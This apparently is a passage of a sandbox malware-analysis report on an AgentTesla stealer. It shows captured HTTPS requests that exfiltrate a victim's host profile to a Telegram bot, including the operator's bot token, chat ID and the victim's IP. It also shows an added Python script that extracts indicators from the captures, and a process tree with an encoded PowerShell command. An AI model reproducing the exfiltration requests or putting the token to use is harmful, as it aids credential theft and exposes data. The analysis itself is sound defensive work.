{"ok":true,"result":{"message_id":281,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333551,"document":{"file_name":"user-888683 2023-03-21 02-51-40.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBGWQYmK_QiLcWyNIiWqTZsxZityzjAAIoDwACJVnIUIUBJzs9m9p0LwQ","file_unique_id":"AgADKA8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/21/2023 02:51:40\nUser Name: user/888683\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49698 | 173.231.16.76 | 443 | C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:33:26 UTC | 2 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2023-03-20 17:33:26 UTC | 2 | IN | HTTP/1.1 200 OK
Content-Length: 14
Content-Type: text/plain
Date: Mon, 20 Mar 2023 17:33:26 GMT
Vary: Origin
Connection: close
2023-03-20 17:33:26 UTC | 2 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
Data Ascii: 102.129.143.78


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49700 | 149.154.167.220 | 443 | C:\Users\user\Desktop\PSFBGrvmxy.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:33:56 UTC | 2 | OUT | POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8db29826727ee57
Host: api.telegram.org
Content-Length: 972
Expect: 100-continue
Connection: Keep-Alive
2023-03-20 17:33:56 UTC | 3 | IN | HTTP/1.1 100 Continue
2023-03-20 17:33:56 UTC | 3 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 32 36 37 32 37 65 65 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 32 36 37 32 37 65 65 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 32 30 3a 33 33 3a 34 35 0a 55 73 65 72
Data Ascii: -----------------------------8db29826727ee57Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29826727ee57Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 20:33:45User
2023-03-20 17:33:56 UTC | 4 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 20 Mar 2023 17:33:56 GMT
Content-Type: application/json
Content-Length: 727
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":283,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333636,"document":{"file_name":"user-888683 2023-03-20 20-33-45.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBG2QYmQTsLulnnthcrp4zDpbYwYe0AAIrDwACJVnIUMB_Uwiye44ELwQ","file_unique_id":"AgADKw8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 20:33:45\nUser Name: user/888683\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49702 | 149.154.167.220 | 443 | C:\Users\user\Desktop\PSFBGrvmxy.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:34:27 UTC | 5 | OUT | POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8db2971bc1af64d
Host: api.telegram.org
Content-Length: 972
Expect: 100-continue
Connection: Keep-Alive
2023-03-20 17:34:27 UTC | 5 | IN | HTTP/1.1 100 Continue
2023-03-20 17:34:27 UTC | 5 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 62 63 31 61 66 36 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 62 63 31 61 66 36 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 31 38 3a 33 34 3a 32 36 0a 55 73 65 72
Data Ascii: -----------------------------8db2971bc1af64dContent-Disposition: form-data; name="chat_id"6169364705-----------------------------8db2971bc1af64dContent-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 18:34:26User
2023-03-20 17:34:27 UTC | 6 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 20 Mar 2023 17:34:27 GMT
Content-Type: application/json
Content-Length: 727
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":284,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333667,"document":{"file_name":"user-888683 2023-03-20 18-34-26.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBHGQYmSOqXzAbpkzNM4JK4my7ity6AAIuDwACJVnIUJXaN9ousW0ULwQ","file_unique_id":"AgADLg8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 18:34:26\nUser Name: user/888683\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}
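The five HTTPS sessions above capture the sample's whole network life cycle: a GET to api.ipify.org to learn the victim's public address, then repeated multipart POSTs to the Telegram Bot API sendDocument method whose URL path carries the bot token, whose body carries the operator's chat_id and a "New PW Recovered!" caption, and whose JSON reply echoes the caption in full. The script below is an added example written for this report, not code from Joe Sandbox or from the sample. It takes Session 1 exactly as recorded (request line, Content-Type boundary, the "Data Raw" hex of the outbound body, and the server's JSON) and returns the indicators a responder would hand to blocking and hunting: bot id, token, chat_id, API method, bot username, the uploaded file name and the host-profile fields. All function names and the `is_telegram_bot_request` predicate are this example's own.

```python
"""Pull indicators out of a captured Telegram Bot API exfiltration session.

Added example for this report (not Joe Sandbox or sample code). The sample input
is copied from HTTPS Session 1 above: request line, Content-Type header, the
outbound body as hex ("Data Raw", which ends at "User") and the JSON reply.
"""
import json
import re

REQUEST_LINE = "POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1"
CONTENT_TYPE = "multipart/form-data; boundary=---------------------------8db29b7328c749b"
BODY_HEX = (
    "0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d "
    "38 64 62 32 39 62 37 33 32 38 63 37 34 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 "
    "69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 "
    "22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a "
    "2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d "
    "38 64 62 32 39 62 37 33 32 38 63 37 34 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 "
    "69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e "
    "22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 "
    "33 2f 32 31 2f 32 30 32 33 20 30 32 3a 35 31 3a 34 30 0a 55 73 65 72"
)
RESPONSE_JSON = (
    r'{"ok":true,"result":{"message_id":281,"from":{"id":5687731944,"is_bot":true,'
    r'"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,'
    r'"first_name":"99","last_name":"Grams","type":"private"},"date":1679333551,'
    r'"document":{"file_name":"user-888683 2023-03-21 02-51-40.html","mime_type":"text/html",'
    r'"file_id":"BQACAgQAAxkDAAIBGWQYmK_QiLcWyNIiWqTZsxZityzjAAIoDwACJVnIUIUBJzs9m9p0LwQ",'
    r'"file_unique_id":"AgADKA8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\n'
    r'Time: 03/21/2023 02:51:40\nUser Name: user/888683\nOSFullName: Microsoft Windows 10 Pro\n'
    r'CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78",'
    r'"caption_entities":[{"offset":178,"length":14,"type":"url"}]}}'
)

# Bot API paths have the shape /bot<bot_id>:<token>/<method>; the token is the secret.
BOT_PATH_RE = re.compile(
    r"^(?P<verb>GET|POST) /bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>\w+) HTTP/1\.[01]$"
)


def parse_request_line(line):
    """Return verb, bot_id, token and API method for a Bot API request line, else None."""
    m = BOT_PATH_RE.match(line.strip())
    return m.groupdict() if m else None


def is_telegram_bot_request(host, request_line):
    """Detection predicate: a Bot API call made by a desktop process deserves an alert."""
    return host == "api.telegram.org" and parse_request_line(request_line) is not None


def parse_multipart(body, content_type):
    """Split a multipart/form-data body into {field: bytes}; tolerate a cut-off dump."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delim = b"--" + m.group(1).encode()
    complete = body.rstrip().endswith(delim + b"--")   # closing "--boundary--" seen?
    fields = {}
    for part in body.split(delim)[1:]:                  # [0] is the preamble
        if part.startswith(b"--"):                      # closing delimiter
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, sep, data = part.partition(b"\r\n\r\n")
        if not sep:                                     # dump ended inside part headers
            break
        name = re.search(rb'name="([^"]*)"', head)
        if data.endswith(b"\r\n"):                      # CRLF that precedes the next delimiter
            data = data[:-2]
        fields[name.group(1).decode() if name else "?"] = data
    return fields, complete


def parse_caption(text):
    """The 'New PW Recovered!' caption is a block of 'Key: value' lines."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def extract_iocs(request_line, content_type, body_hex, response_json):
    """Combine request path, multipart fields and the server's echo into one IOC record."""
    req = parse_request_line(request_line)
    if req is None:
        raise ValueError("not a Telegram Bot API request line")
    fields, complete = parse_multipart(bytes.fromhex(body_hex), content_type)
    result = json.loads(response_json).get("result", {})
    chat_id = fields.get("chat_id", b"").decode()
    return {
        "bot_id": req["bot_id"],
        "token": req["token"],            # full control of the bot: block and report
        "api_method": req["method"],
        "chat_id": chat_id,
        "chat_id_confirmed": str(result.get("chat", {}).get("id")) == chat_id,
        "body_complete": complete,        # False: the sandbox dump stops mid-caption
        "caption_fields": parse_caption(fields.get("caption", b"").decode("utf-8", "replace")),
        "bot_username": result.get("from", {}).get("username"),
        "file_name": result.get("document", {}).get("file_name"),
        "exfil_fields": parse_caption(result.get("caption", "")),   # full host profile
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(REQUEST_LINE, CONTENT_TYPE, BODY_HEX, RESPONSE_JSON), indent=2))
```

Two points the run makes visible. The token sits in the URL path, so it is recoverable wherever TLS is terminated and inspected (the sandbox did that here), and it is the indicator that matters most, since whoever holds it receives the stolen documents. The captured outbound body ends at "User", so the parser reports `body_complete` as False and recovers only the Time field from the request itself; the full host profile (user name, OS, CPU, RAM, public IP) is taken from the server's echo of the caption in the 200 OK, which is why the response is worth parsing alongside the request.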


                                                                                      Target ID:0
                                                                                      Start time:18:31:46
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Imagebase:0x740000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Target ID:1
                                                                                      Start time:18:31:54
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Reputation:high

                                                                                      Target ID:2
                                                                                      Start time:18:31:54
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:3
                                                                                      Start time:18:32:22
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\PSFBGrvmxy.exe
                                                                                      Imagebase:0x870000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Target ID:4
                                                                                      Start time:18:32:30
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                                                                                      Imagebase:0xe10000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 67%, ReversingLabs
                                                                                      Reputation:low

                                                                                      Target ID:7
                                                                                      Start time:18:32:39
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                      Imagebase:0x240000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 67%, ReversingLabs
                                                                                      Reputation:low

                                                                                      Target ID:8
                                                                                      Start time:18:32:47
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Target ID:9
                                                                                      Start time:18:32:47
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:10
                                                                                      Start time:18:32:49
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                                                                                      Imagebase:0x440000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Target ID:11
                                                                                      Start time:18:32:59
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                      Imagebase:0xd30000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Target ID:12
                                                                                      Start time:18:33:12
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Target ID:13
                                                                                      Start time:18:33:13
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:14
                                                                                      Start time:18:33:20
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Imagebase:0x1d0000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:15
                                                                                      Start time:18:33:20
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                                                                                      Imagebase:0xb70000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                      Target ID:19
                                                                                      Start time:18:33:40
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                      Imagebase:0xf90000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      Target ID:20
                                                                                      Start time:18:33:40
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c72c0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:21
                                                                                      Start time:18:33:49
                                                                                      Start date:20/03/2023
                                                                                      Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                      Imagebase:0x790000
                                                                                      File size:1824768 bytes
                                                                                      MD5 hash:C4B59F8E80A1289B9202A33DA41D7D94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:58
                                                                                        Total number of Limit Nodes:0
                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A2672
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: da10a26346e826f60501b22c1e8b3efe8c5486314cdbc84a366cc5bb7fe399c6
                                                                                        • Instruction ID: c4620396c6aabccd8ebb21aa9be4d6e3870768e5a6cf830fc0c7d4a976e2840f
                                                                                        • Opcode Fuzzy Hash: da10a26346e826f60501b22c1e8b3efe8c5486314cdbc84a366cc5bb7fe399c6
                                                                                        • Instruction Fuzzy Hash: 1021BBB1901305CFCB60EFAAC54839ABBF4EF08324F648469D449AB641C3786984CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 13 12a2899-12a28e8 call 12a26d0 call 12a2728 19 12a28ea-12a28ec 13->19 20 12a28ee 13->20 21 12a28f3-12a28fb 19->21 20->21 22 12a28fd-12a292e RtlEncodePointer 21->22 23 12a2957-12a2969 21->23 25 12a2930-12a2936 22->25 26 12a2937-12a294d 22->26 25->26 26->23
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A291D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: 60abee017cc9b6099d778ee8996029fb429808b51f65b75f2d9759a2e7811f8a
                                                                                        • Instruction ID: 022d3fe4a1c36673c2c2763927e0e8dd6b8eb131fc674ff27946f6b450fd7e41
                                                                                        • Opcode Fuzzy Hash: 60abee017cc9b6099d778ee8996029fb429808b51f65b75f2d9759a2e7811f8a
                                                                                        • Instruction Fuzzy Hash: E62179B080134ACFCB20EFA9C94479ABBF4EB08354F50486ED455A7201D3786A44CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 28 12a25f8-12a263a 31 12a263c-12a263e 28->31 32 12a2640 28->32 33 12a2645-12a2650 31->33 32->33 34 12a2652-12a2683 RtlEncodePointer 33->34 35 12a26b1-12a26be 33->35 37 12a268c-12a26ac 34->37 38 12a2685-12a268b 34->38 37->35 38->37
                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012A2672
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.391274226.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_12a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: ba378307afd95c4e0f738578fd1dd580c91190f419c1cacee386b4258a0fa298
                                                                                        • Instruction ID: 8855b92f42000a168ce1cf468ca2ce7f521431bd2df32fb9ba02cbcbcffaa0b4
